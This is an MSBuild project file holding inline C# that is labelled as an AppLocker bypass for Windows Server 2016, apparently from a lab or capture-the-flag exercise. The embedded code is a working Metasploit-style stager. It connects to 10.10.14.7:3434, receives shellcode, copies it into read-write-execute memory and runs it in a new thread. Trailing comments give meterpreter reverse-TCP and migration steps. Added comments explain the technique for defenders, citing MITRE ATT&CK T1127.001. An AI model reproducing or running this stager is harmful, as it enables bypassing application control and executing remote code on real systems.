//Applocker bypass - Windows 2016 (Build 14393) x64 | |
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SoiYtuH7.xml | |
//Microsoft (R) Build Engine version 4.6.1586.0 | |
//[Microsoft .NET Framework, version 4.0.30319.42000] | |
//Copyright (C) Microsoft Corporation. All rights reserved. | |
//Build started 2/5/2019 8:55:26 PM. | |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --> | |
<Target Name="TGaywVtZz"> | |
<yymnTWKasHV /> | |
</Target> | |
<UsingTask | |
TaskName="yymnTWKasHV" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
<Task> | |
<Code Type="Class" Language="cs"> | |
<![CDATA[ | |
using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities; | |
// Inline MSBuild task. The enclosing project file registers this class through
// CodeTaskFactory and invokes it from its only target, so Execute() runs inside
// msbuild.exe when the project is built.
// Defender view: a signed Microsoft build tool compiles and runs this C# from a
// project file. The observable behaviour is msbuild.exe opening an outbound TCP
// connection, committing read-write-execute memory and starting a thread in it.
// The technique is catalogued as MITRE ATT&CK T1127.001 (Trusted Developer
// Utilities Proxy Execution: MSBuild). Application-control deny rules for
// msbuild.exe on hosts that do not build software remove this path.
public class yymnTWKasHV : Task, ITask { | |
// kernel32 imports. Pointer-sized arguments and return values are declared as
// UInt32, which only fits a 32-bit process; that matches the Framework (not
// Framework64) msbuild.exe path shown in the file's header comment.
[DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 FZzLxk,UInt32 GaYMcefbEK, UInt32 GFGltjlHN, UInt32 rUfXcRhhWyT); | |
[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 EEKWyVg, UInt32 DCQjzDiQ, UInt32 yUAshCNzdWWyiuX,IntPtr qcoQmEAsCYVxJN, UInt32 cwTzTaaIonmPyx, ref UInt32 NIQSzWsYXEXJ); | |
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr ghbDXrzbbkU, UInt32 JRLCRpITaqhthxo); | |
// Connects to the given IPv4 address and port over TCP and returns the bytes
// received from the peer behind a 5-byte prefix, or null when Connect throws.
// Wire format as read here: a 4-byte length, then that many bytes of data.
static byte[] XLiKrUiHVLg(string MWGKqRcvxKiCxsD, int WfkhTLYBl) { | |
IPEndPoint AljjdKQhXFar = new IPEndPoint(IPAddress.Parse(MWGKqRcvxKiCxsD), WfkhTLYBl); | |
Socket AOjJkaknaCLabUb = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); | |
// Any connection failure is swallowed; the caller only sees null.
try { AOjJkaknaCLabUb.Connect(AljjdKQhXFar); } | |
catch { return null;} | |
// The first 4 bytes from the peer are taken as the data length (BitConverter, host byte order).
byte[] mdoldF = new byte[4]; | |
AOjJkaknaCLabUb.Receive(mdoldF, 4, 0); | |
int MgAnjUozvMDSsv = BitConverter.ToInt32(mdoldF, 0); | |
// The buffer keeps 5 bytes free at the front for the prefix written below.
byte[] KCEwzCyVtln = new byte[MgAnjUozvMDSsv + 5]; | |
int fjlRsQatOOXVF = 0; | |
// Read until the announced length has arrived, at most 4096 bytes per Receive call.
while (fjlRsQatOOXVF < MgAnjUozvMDSsv) | |
{ fjlRsQatOOXVF += AOjJkaknaCLabUb.Receive(KCEwzCyVtln, fjlRsQatOOXVF + 5, (MgAnjUozvMDSsv - fjlRsQatOOXVF) < 4096 ? (MgAnjUozvMDSsv - fjlRsQatOOXVF) : 4096, 0);} | |
// Prefix = byte 0xBF followed by the 4-byte socket handle value. 0xBF is the x86
// opcode for "mov edi, imm32", so the prefix passes the still-open socket to the
// received code. NOTE(review): presumably the stager convention of the Metasploit
// payload named in the file's trailing notes; confirm. The socket is not closed here.
byte[] HUDMCDCGhunIblU = BitConverter.GetBytes((int)AOjJkaknaCLabUb.Handle); | |
Array.Copy(HUDMCDCGhunIblU, 0, KCEwzCyVtln, 1, 4); KCEwzCyVtln[0] = 0xBF; | |
return KCEwzCyVtln;} | |
// Copies the buffer into freshly allocated memory and runs it as a native thread.
// Does nothing when the buffer is null.
static void xxtKMgGJV(byte[] jLKRseom) { | |
if (jLKRseom != null) { | |
// 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE. Memory that is both writable
// and executable is a common signal for memory scanners and EDR.
UInt32 XewKEzI = VirtualAlloc(0, (UInt32)jLKRseom.Length, 0x1000, 0x40); | |
Marshal.Copy(jLKRseom, 0, (IntPtr)(XewKEzI), jLKRseom.Length); | |
IntPtr FGAnYqQsIBfSRGz = IntPtr.Zero; | |
UInt32 APoDWpuRSVvZO = 0; | |
IntPtr GHFmTAQDl = IntPtr.Zero; | |
// The thread start address is the allocated region, i.e. code not backed by any module on disk.
FGAnYqQsIBfSRGz = CreateThread(0, 0, XewKEzI, GHFmTAQDl, 0, ref APoDWpuRSVvZO); | |
// 0xFFFFFFFF = INFINITE: the task, and with it msbuild.exe, blocks for as long as the thread runs.
WaitForSingleObject(FGAnYqQsIBfSRGz, 0xFFFFFFFF); }} | |
// Task entry point called by MSBuild. The endpoint 10.10.14.7:3434 is hard-coded
// (a private 10.0.0.0/8 address) and is the network indicator for this sample.
// Returns true on every path that returns, so a failed connection still reports a successful task.
public override bool Execute() | |
{ | |
byte[] vKluxGThzSA = null; vKluxGThzSA = XLiKrUiHVLg("10.10.14.7", 3434); | |
xxtKMgGJV(vKluxGThzSA); | |
return true; } } | |
]]> | |
</Code> | |
</Task> | |
</UsingTask> | |
</Project> | |
// Migrate -> x64 | |
// use windows/local/payload_inject | |
// set payload windows/x64/meterpreter/reverse_tcp |